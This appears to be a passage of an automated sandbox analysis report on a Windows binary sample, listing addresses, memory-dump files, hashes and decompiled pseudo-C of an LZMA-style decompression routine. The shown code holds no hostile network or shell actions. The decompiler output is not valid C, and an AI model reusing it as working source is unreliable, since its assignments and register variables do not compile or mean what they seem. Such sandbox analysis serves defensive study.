                                                              0x00406f0f
                                                              0x00406d8d
                                                              0x00406d8f
                                                              0x00406d91
                                                              0x00406d93
                                                              0x00406d96
                                                              0x00406d97
                                                              0x00406d99
                                                              0x00406d9b
                                                              0x00406d9e
                                                              0x00406da1
                                                              0x00406db7
                                                              0x00406dbc
                                                              0x00406df4
                                                              0x00406df4
                                                              0x00406df8
                                                              0x00406e24
                                                              0x00406e26
                                                              0x00406e2d
                                                              0x00406e30
                                                              0x00406e33
                                                              0x00406e33
                                                              0x00406e38
                                                              0x00406e38
                                                              0x00406e3a
                                                              0x00406e3d
                                                              0x00406e44
                                                              0x00406e47
                                                              0x00406e74
                                                              0x00406e74
                                                              0x00406e77
                                                              0x00406e7a
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00406eee
                                                              0x00000000
                                                              0x00406eee
                                                              0x00406e7c
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8b
                                                              0x00406e8e
                                                              0x00406e91
                                                              0x00406e94
                                                              0x00406e97
                                                              0x00406e9a
                                                              0x00406e9d
                                                              0x00406eb6
                                                              0x00406eb8
                                                              0x00406ebb
                                                              0x00406ebc
                                                              0x00406ebf
                                                              0x00406ec1
                                                              0x00406ec4
                                                              0x00406ec6
                                                              0x00406ec8
                                                              0x00406ecb
                                                              0x00406ecd
                                                              0x00406ed0
                                                              0x00406ed4
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed7
                                                              0x00406eda
                                                              0x00406edd
                                                              0x00406e9f
                                                              0x00406e9f
                                                              0x00406ea7
                                                              0x00406eac
                                                              0x00406eae
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406ee0
                                                              0x00406ee7
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00406e71
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00000000
                                                              0x00406ee9
                                                              0x00406ee7
                                                              0x00406dfa
                                                              0x00406dfd
                                                              0x00406dff
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0a
                                                              0x00406e0d
                                                              0x00406e10
                                                              0x00406e10
                                                              0x00406e13
                                                              0x00406e13
                                                              0x00406e16
                                                              0x00406e1d
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00406df1
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00000000
                                                              0x00406e1f
                                                              0x00406e1d
                                                              0x00406da3
                                                              0x00406da6
                                                              0x00406da8
                                                              0x00406dab
                                                              0x00000000
                                                              0x00000000
                                                              0x00406b0a
                                                              0x00406b0a
                                                              0x00406b0e
                                                              0x00407153
                                                              0x00000000
                                                              0x00407153
                                                              0x00406b14
                                                              0x00406b17
                                                              0x00406b1a
                                                              0x00406b1d
                                                              0x00406b20
                                                              0x00406b23
                                                              0x00406b26
                                                              0x00406b28
                                                              0x00406b2b
                                                              0x00406b2e
                                                              0x00406b31
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00406b33
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c95
                                                              0x00406c95
                                                              0x00406c99
                                                              0x0040715f
                                                              0x00000000
                                                              0x0040715f
                                                              0x00406c9f
                                                              0x00406ca2
                                                              0x00406ca5
                                                              0x00406ca8
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406caa
                                                              0x00406cad
                                                              0x00406cb0
                                                              0x00406cb3
                                                              0x00406cb6
                                                              0x00406cb9
                                                              0x00406cbc
                                                              0x00406cbd
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cbf
                                                              0x00406cc2
                                                              0x00406cc5
                                                              0x00406cc8
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406ccb
                                                              0x00406cce
                                                              0x00406cd0
                                                              0x00406cd0
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f12
                                                              0x00406f16
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f1c
                                                              0x00406f1f
                                                              0x00406f22
                                                              0x00406f25
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f27
                                                              0x00406f2a
                                                              0x00406f2d
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00406f36
                                                              0x00406f39
                                                              0x00406f3a
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3c
                                                              0x00406f3f
                                                              0x00406f42
                                                              0x00406f45
                                                              0x00406f48
                                                              0x00406f4b
                                                              0x00406f4f
                                                              0x00406f51
                                                              0x00406f54
                                                              0x00000000
                                                              0x00406f56
                                                              0x00406cd3
                                                              0x00406cd3
                                                              0x00000000
                                                              0x00406cd3
                                                              0x00406f54
                                                              0x00407189
                                                              0x004071ab
                                                              0x004071b1
                                                              0x004071b3
                                                              0x004071ba
                                                              0x004071bc
                                                              0x004071c3
                                                              0x004071c7
                                                              0x00000000
                                                              0x004067b8
                                                              0x004071c0
                                                              0x004071c0
                                                              0x00000000
                                                              0x004071c0
                                                              0x0040700d
                                                              0x00407093
                                                              0x00407099
                                                              0x0040709c
                                                              0x0040709f
                                                              0x004070a2
                                                              0x004070a5
                                                              0x004070a8
                                                              0x004070ab
                                                              0x004070ae
                                                              0x004070b4
                                                              0x004070cd
                                                              0x004070d0
                                                              0x004070d3
                                                              0x004070d6
                                                              0x004070da
                                                              0x004070dc
                                                              0x004070dd
                                                              0x004070e0
                                                              0x004070b6
                                                              0x004070b6
                                                              0x004070be
                                                              0x004070c3
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070c8
                                                              0x004070ea
                                                              0x00000000
                                                              0x004070ec
                                                              0x00000000
                                                              0x004070ec
                                                              0x004070ea
                                                              0x00000000
                                                              0x00406f5f

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                              • Instruction ID: 66e4c3ae890465860883969c5b36e42f4395a0ef1606ee2efde14a16b44166c2
                                                              • Opcode Fuzzy Hash: 76451a61548a05875e54a201c0622e54c4b3ee1b55beed09f1cff06290f44a2f
                                                              • Instruction Fuzzy Hash: F9913171D04229CBDF28CF98C8447ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406C71, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406C71() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
